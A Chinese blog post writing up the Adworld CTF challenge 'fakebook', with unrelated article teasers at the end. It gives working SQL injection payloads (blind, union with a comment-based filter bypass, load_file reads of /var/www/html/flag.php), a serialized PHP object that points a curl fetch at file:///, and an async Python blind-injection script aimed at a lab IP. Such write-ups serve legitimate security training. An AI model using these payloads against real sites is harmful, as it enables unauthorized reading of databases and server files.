news 2026/5/25 5:23:53

[CTF]攻防世界:fakebook (sql注入)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[CTF]攻防世界:fakebook (sql注入)

题目:攻防世界:fakebook (sql注入)

提示:sql注入


步骤

  1. 进入网站查看下功能点,一个登录一个加入。加入一个

注册后自动返回首页,显示出了刚刚注册的用户信息,并且可以点开。

这是点开后的展示页面


  1. 针对上面对注册和登录点进行抓包,然后尝试注入,login和join页面似乎不存在注入,不过在view展示页面,似乎存在盲注

payload:?no=1 and 1=1 / and 1=2


这里记录一下,爆出了网站目录:/var/www/html


  1. 扫描网站看一下



下载user.php.bak看下

<?phpclassUserInfo{public $name="";public $age=0;public $blog="";public function__construct($name,$age,$blog){$this->name=$name;$this->age=(int)$age;$this->blog=$blog;}functionget($url){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$output=curl_exec($ch);$httpCode=curl_getinfo($ch,CURLINFO_HTTP_CODE);if($httpCode==404){return404;}curl_close($ch);return$output;}public function getBlogContents(){return$this->get($this->blog);}public function isValidBlog(){$blog=$this->blog;returnpreg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i",$blog);}}

发现是一个用户类,有些方法和blog的效验。

returnpreg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i",$blog);

只允许http或https开头,符合域名形式的地址输入,在join页面的时候调用了此方法进行校验。如果可以绕过应该可以利用上面的curl进行file://、gopher://等读文件…尝试了下,没法利用。


  1. 那还是回到sql注入。
    没看到扫描目录中存在flag.php的时候,还在死板的进行sql注入拿数据库名、表名、列名…
数据库:view.php?no=1ANDASCII(SUBSTR((DATABASE()),1,1))>1表名:view.php?no=1and(SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT0,1)

后面测试了半天,发现数据库名为:fakebook,只有一个表users。


  1. 回到flag.php,根据之前报错的目录,拼接出 地址:/var/www/html/flag.php,用load_file依次读出内容。


后面直接用ai生成一个脚本,爆破出flag.php的内容:

#!/usr/bin/env python3importasyncio,aiohttp URL="http://61.147.171.105:53869/view.php"FILE="/var/www/html/flag.php"LEN=70TOK="xxx"# 正常页面关键字 CONC=3TIME=30asyncdefreq(payload:str)->bool:asyncwithsemaphore:asyncwithsession.get(URL,params={'no':f'1 and {payload}'},timeout=TIME)asr:returnTOKinawaitr.text()asyncdefget_char(pos:int)->str:v=0forbitinrange(7):#0-127只需7位 payload=f"ORD(MID(LOAD_FILE('{FILE}'),{pos},1))&{1<<bit}"ifawaitreq(payload):v|=1<<bitreturnchr(v)asyncdefmain():global semaphore,session semaphore=asyncio.Semaphore(CONC)asyncwithaiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=CONC))assession:flag=awaitasyncio.gather(*(get_char(i)foriinrange(1,LEN+1)))print(''.join(flag))if__name__=='__main__':asyncio.run(main())


补充一下其他方法:
上面view.php?no=1 注入时,测试:?no = -1 union select 1,2,3,4–+联合注入 发现有过滤了 union select

可以绕过:union//select**
继续 ?no = -1 union//select 1,2,3,4–+ 爆出2回显位

?no=-1 union//select 1,user(),3,4–+
//数据库信息


其实通过联合查询可以直接查出flag.php内容:

?no=-1union/**/select1,load_file("/var/www/html/flag.php"),3,4--+


另外一种继续爆破数据库:
然后爆字段名:

?no=-1union/**/select1,group_concat(column_name),3,4from information_schema.columns where table_name='users'--+


发现data字段,读一个看看

似乎和之前下载的备份 user.php.bak 中用户类有关系,看起来像序列化之后的内容。

直接改动 123.blog 为file:///var/www/html/flag.php

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

payload:

?no=-1union/**/select1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

查看源码,发现iframe框架中有base64的加密内容

base64解密得到flag


版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/21 21:04:50

Ollama支持Qwen3-VL-8B吗?本地部署实测报告

Ollama支持Qwen3-VL-8B吗&#xff1f;本地部署实测报告 在智能终端设备日益依赖视觉理解能力的今天&#xff0c;一个现实问题摆在开发者面前&#xff1a;如何在保障数据隐私的前提下&#xff0c;以较低成本实现高质量的图文理解功能&#xff1f;尤其是在电商商品识别、客服自动…

作者头像 李华
网站建设 2026/5/14 6:18:24

终极指南:如何在VMware中免费解锁macOS虚拟机支持

终极指南&#xff1a;如何在VMware中免费解锁macOS虚拟机支持 【免费下载链接】unlocker VMware Workstation macOS 项目地址: https://gitcode.com/gh_mirrors/un/unlocker 你是否曾经想在Windows或Linux系统上体验macOS的流畅操作&#xff0c;却发现VMware Workstati…

作者头像 李华
网站建设 2026/5/22 2:04:48

Linux网络层核心技术揭秘: 从IP协议到内核实现深度剖析

Linux网络层核心技术揭秘: 从IP协议到内核实现深度剖析 在当今的互联网世界中, Linux凭借其稳定、高效的网络协议栈实现, 成为服务器、云计算和网络设备领域的基石. 理解Linux网络层的核心原理不仅有助于我们优化网络应用性能, 更能深入掌握现代网络通信的本质 1. 网络层的基础…

作者头像 李华
网站建设 2026/5/21 18:52:36

简单线程池实现(单例模式)

1.概念 基本概念 线程池是一种多线程处理形式&#xff0c;它预先创建一组线程并管理它们&#xff0c;避免频繁创建和销毁线程带来的性能开销。 在 Linux 环境下&#xff0c;线程池&#xff08;Thread Pool&#xff09;是一种常用的并发编程模型&#xff0c;用于复用线程资源&…

作者头像 李华
网站建设 2026/5/22 19:51:46

类与对象三大核心函数:构造、析构、拷贝构造详解

类与对象三大核心函数&#xff1a;构造、析构、拷贝构造详解 一、引言 在C面向对象编程中&#xff0c;构造函数、析构函数和拷贝构造函数被称为"三大件"&#xff08;Rule of Three&#xff09;。它们是类设计的基石&#xff0c;决定了对象的创建、拷贝和销毁行为。…

作者头像 李华
网站建设 2026/5/21 15:27:02

UiPath在金融行业的5个高价值应用案例

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容&#xff1a; 开发一个UiPath自动化流程&#xff0c;模拟银行对账单处理场景。流程应包括&#xff1a;1)自动登录网银系统下载对账单&#xff1b;2)使用OCR技术识别对账单内容&#xff1b;3)与内…

作者头像 李华